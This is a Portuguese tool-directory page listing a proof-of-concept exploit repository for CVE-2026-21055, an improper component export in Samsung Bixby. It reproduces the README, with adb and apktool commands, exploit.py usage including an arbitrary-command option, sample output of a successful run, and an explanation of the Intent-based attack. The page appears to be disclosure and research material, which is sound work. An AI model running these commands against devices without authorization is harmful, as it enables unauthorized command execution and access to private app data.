Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
samsung-bixby-command-execution-cve-2026-21055-improper-component-export — Exploit de prova de conceito para CVE-2026-21055 demonstrando execução arbitrária de comandos via componentes Android exportados indevidamente no Samsung Bixby. Inclui análise de componentes e scripts de ataque baseados em Intent. | Kitploit
Ferramentas/GitHubGitHub/hunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export
Segurança AndroidAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança MóvelAprendizado e EducaçãoExploração de Binários
GitHubhunt-benito/samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

samsung-bixby-command-execution-cve-2026-21055-improper-component-export

Exploit de prova de conceito para CVE-2026-21055 demonstrando execução arbitrária de comandos via componentes Android exportados indevidamente no Samsung Bixby. Inclui análise de componentes e scripts de ataque baseados em Intent.

Ver Repositório
1há 1 mêsAinda não revisado

CVE-2026-21055 PoC — Exportação Incorreta de Componentes do Samsung Bixby

Prova de Conceito para CVE-2026-21055: A exportação incorreta de componentes de aplicativos Android no Samsung Bixby anterior à versão 4.0.70.8 permite que invasores locais executem comandos arbitrários com privilégio do Bixby.

Visão Geral

Este repositório contém dois scripts Python:

  1. analyze_components.py — Analisa um AndroidManifest.xml descompilado para enumerar activities, services, receivers e providers exportados. Sinaliza componentes exportados sem proteção de permissão.

  2. exploit.py — Demonstra o ataque baseado em Intent enviando um Intent de broadcast personalizado para o receiver de comandos exportado do Bixby via adb shell am, executando um comando com privilégios de nível de sistema do Bixby.

Detalhes da Vulnerabilidade

CampoValor
ID CVECVE-2026-21055
Samsung SVESVE-2026-0917
CVSS v4.08.5 — High
CWECWE-926 — Exportação Incorreta de Componentes de Aplicativos Android
App AtingidoSamsung Bixby (com.samsung.android.bixby.agent)
Versões Atingidas< 4.0.70.8
Versão Corrigida4.0.70.8
Vetor de AtaqueLocal (aplicativo malicioso no mesmo dispositivo)
Privilégios ExigidosNenhum
Interação do UsuárioNenhum
ImpactoExecução de comandos arbitrários com privilégio do Bixby

Pré-requisitos

  • adb (Android SDK Platform Tools) instalado e no PATH
  • Um dispositivo Samsung Galaxy com depuração USB ativada
  • Versão do Bixby < 4.0.70.8 no dispositivo alvo
  • Para análise de componentes: apktool instalado e no PATH

Uso

1. Analisar Componentes Exportados do Bixby

Extraia o APK do Bixby do dispositivo e descompile-o:

root@kitploit:~
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent

# Pull the APK
$ adb pull <apk_path> bixby.apk

# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f

Execute o script de análise:

root@kitploit:~
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml

Ou deixe o script descompilar automaticamente:

root@kitploit:~
$ python3 analyze_components.py --apk bixby.apk

2. Listar Componentes Exportados em um Dispositivo Ativo

root@kitploit:~
$ python3 exploit.py --list

3. Executar o Exploit

root@kitploit:~
# Default: execute 'id' command
$ python3 exploit.py

# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"

# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver

Saída Esperada

root@kitploit:~
============================================================
  CVE-2026-21055 PoC — Samsung Bixby Command Execution
  Improper Export of Android Application Components
============================================================

[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version:  4.0.69.2
[*] Vulnerable:     YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx

[*] Executing exploit...
[*] Crafting exploit Intent...
    Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
    Action:    com.samsung.android.bixby.agent.ACTION_RUN_SHELL
    Command:   id
    Output:    /data/local/tmp/bixby_poc_output

[+] Intent sent.

[+] Command output (executed with Bixby privilege):
    uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)

[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx

Como Funciona

  1. Exportação de Componentes: O Bixby exporta um ou mais componentes (services/receivers) que lidam com execução de comandos ou gatilhos de automação. Esses componentes são exportados com android:exported="true" mas sem um atributo android:permission ou verificações de permissão em tempo de execução.

  2. Entrega de Intent: Qualquer aplicativo no dispositivo pode enviar um Intent para esses componentes exportados. O Intent carrega uma string de ação (ex.: ACTION_RUN_SHELL) e extras de string contendo o comando a ser executado e um caminho de arquivo de saída.

  3. Execução de Comando: O componente exportado do Bixby recebe o Intent, extrai o comando e o executa via Runtime.exec() ou mecanismo similar. O comando é executado no contexto do processo do Bixby, herdando todas as permissões de nível de sistema do Bixby.

  4. Sem Interação do Usuário: O exploit não requer interação do usuário. O aplicativo malicioso envia o Intent silenciosamente em segundo plano.

Aviso Legal

Esta PoC é fornecida apenas para fins educacionais e de pesquisa em segurança. Teste apenas em dispositivos que você possui ou para os quais tenha autorização explícita para testar. Não use este exploit contra dispositivos sem o consentimento do proprietário.

Fontes

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-21055
  • Samsung Mobile Security Bulletin (July 2026): https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=07
  • CWE-926: https://cwe.mitre.org/data/definitions/926.html
Baixar ferramenta